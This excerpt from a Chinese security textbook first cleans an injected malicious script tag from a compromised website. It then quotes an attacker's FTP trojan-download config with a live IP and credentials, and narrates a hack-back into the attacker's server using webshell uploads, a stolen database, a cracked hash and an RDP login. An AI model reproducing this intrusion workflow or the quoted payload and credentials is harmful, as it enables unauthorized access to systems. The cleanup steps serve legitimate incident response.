- 網絡攻防實戰研究:漏洞利用與提權
- 祝烈煌
- 1935字
- 2019-11-18 15:09:45
2.13 社工滲透并提權某服務器
筆者的一個朋友在訪問自己公司的網站時找出了很多奇怪的文件,殺毒軟件提示網頁存在病毒,筆者的第一感覺就是服務器被入侵了。
2.13.1 網站掛馬的檢測和清除
1.使用軟件嗅探被掛馬頁面
在虛擬機中使用URLSnooper軟件對網站進行嗅探,果然發現網站的多個文件被掛馬,如圖2-126所示。登錄遠程終端后,發現服務器配置較高,帶寬是20MB/s光纖,訪問網絡的速度非常快,確實是攻擊者眼中高質量的肉機。
圖2-126 使用URLSnooper監聽網站的所有鏈接和訪問
說明
· URLSnooper是一款安全檢查工具,根據名稱就知道該軟件的作用是進行URL監視,筆者認為它是一款捕捉網站是否掛馬的好程序。URLSnooper的安裝比較簡單,安裝完畢后需要安裝默認的抓包軟件。
·確認網站被掛馬后,首先要將網站文件進行備份。
直接到網站根目錄查看網站文件的最近修改時間,首頁的更改時間為8月25日,因此可以借助系統的文件搜索功能搜索8月24日至8月26日之間的文件。如圖2-127所示,搜索出幾十個文件。被修改的文件很有特點,index.html、index.asp、conn.asp、top.asp、foot.asp及js文件均被修改,從文件中可以看出,該攻擊者絕對是一個團伙或者一個老手,他不是對所有文件進行掛馬,而是有針對性地對關鍵文件進行掛馬。
圖2-127 查找被修改的網站文件
2.清除掛馬代碼
在所有文件中查找代碼“<script src=http://%61%76%65%31%2E%63%6E></script>”并將其清除。
2.13.2 入侵痕跡的搜索和整理
對系統目錄及服務器的所有目錄進行查看,發現該攻擊者使用過“1433全自動掃描傳馬工具”。通過對該工具軟件的研究和分析得知,它需要使用配置文件來下載木馬。果不其然,在系統目錄下發現文件cc1.txt的生成日期是5月29日,大小只有64字節,用type命令顯示如下。
open 122.138.14.8
gusdn
lixuanyu
binary
get 1.exe
bye
該文件是FTP自動下載的配置信息。直接使用CuteFTP軟件進行FTP登錄嘗試,填好IP地址、賬號和密碼,順利登錄,如圖2-128所示。從服務器中的文件不難看出,這臺機器的FTP路徑是Windows系統某個磁盤的根目錄,里面有不少黑客工具,機主肯定是一個攻擊者或者安全愛好者。
圖2-128 成功登錄FTP服務器
說明
很多攻擊者在利用網上下載的工具時,沒有很好地設置和改造,只是進行簡單的配置后便開始攻擊,因此,在肉機上經常會留下各種木馬的安裝文件,有時甚至有FTP自動上傳文件的配置文件。可以使用“dir/od/a”命令查看當前目錄中的文件,小于100字節的文件極有可能為配置文件。
使用掃描工具軟件查看該計算機開放了哪些端口。如圖2-129所示,系統開放了80端口和遠程終端服務3389端口。
圖2-129 查看遠程服務器開放端口
2.13.3 利用社會工程學進行反滲透
1.使用獲取的FTP賬號猜測服務器登錄口令
既然服務器開放了3389端口、FTP服務,那么可以嘗試利用FTP的賬號和口令登錄它的3389遠程桌面,猜測administrator的口令。結果不是gusdn,也不是lixuanxu,說明使用FTP賬號和口令不能進入系統。所以,需要換一個思路。
2.從網站入手
使用IE瀏覽器打開該IP地址,可以正常訪問網站。該服務器提供了Web服務,網站為游戲私服服務器,如圖2-130所示,通過HDSI及Domain 3.5等SQL注入工具對網站進行探測,未找到可以利用的地方。
圖2-130 服務器提供Web服務
3.從FTP目錄入手
在FTP的目錄中有一個Web子目錄,會不會與網站有關系呢?先上傳一個ASP木馬到Web目錄試試——這個目錄居然正是網站的根目錄,ASP木馬可以正常運行。如圖2-131所示,通過ASP木馬在網站中看了看,發現可以瀏覽所有磁盤,不過只有D盤有寫權限。與FTP中的文件進行對比,發現FTP的根目錄就是D盤。
圖2-131 上傳ASP木馬
現在,既可以上傳文件,也可以瀏覽文件了。要想提升權限,必須能執行命令。筆者上傳了一個ASP的CMD木馬到Web目錄下,結果竟然不能執行。繼續利用ASP木馬在機器上尋找其他突破口,結果一無所獲。FTP不是用Serv-u開的,C盤不可寫,不能執行命令,怎么辦?
4.上傳ASP.NET木馬提升系統權限
在用3389登錄這臺機器時,它的操作系統是Windows Server 2003,可能支持ASP.NET。上傳一個ASPX的CMD木馬,ASPX木馬能執行命令了,如圖2-132所示。查看機器的用戶列表,居然沒有administrator,卻有一個xuanyu,而FTP的口令是“lixuanyu”,一定是管理員把超級用戶改名了。它的口令會是什么呢?還是用3389登錄器測試一下,不是“gusdn”,不是“lixuanyu”,更不是“12345678”——猜不出來了。
圖2-132 使用ASP.NET木馬查看系統管理員賬號
5.獲取數據庫用戶管理員密碼
按照密碼設置習慣,攻擊者極有可能使用了相同的密碼,因此可以嘗試獲取數據庫中用戶的密碼來登錄遠程終端服務器。使用CuteFTP對整個網站目錄中的文件進行查看,在TT目錄下發現數據庫文件“$_$%●yingzi★! #%&^$#.asa”。使用FTP下載這個文件,把文件的后綴改為“mdb”,使用Access直接打開該數據庫,如圖2-133所示,從中找到管理員使用的表Gq_Admin。
圖2-133 獲取管理員表Gq_Admin
從表Gq_Admin中發現存在gusdn用戶,并且是高級管理員,密碼使用MD5加密后是“5334e6dd7b8exxxx”。打開網頁www.cmd5.com,填好16位密碼,解密后密碼為“12703XXX”,如圖2-134所示。
圖2-134 獲取用戶的密碼
6.再次登錄遠程終端
直接打開遠程終端連接器,在其中輸入用戶名“xuanyu”,密碼“12703XXX”,然后單擊“連接”按鈕,很快就成功進入該計算機,如圖2-135所示。
圖2-135 成功進入攻擊者計算機服務器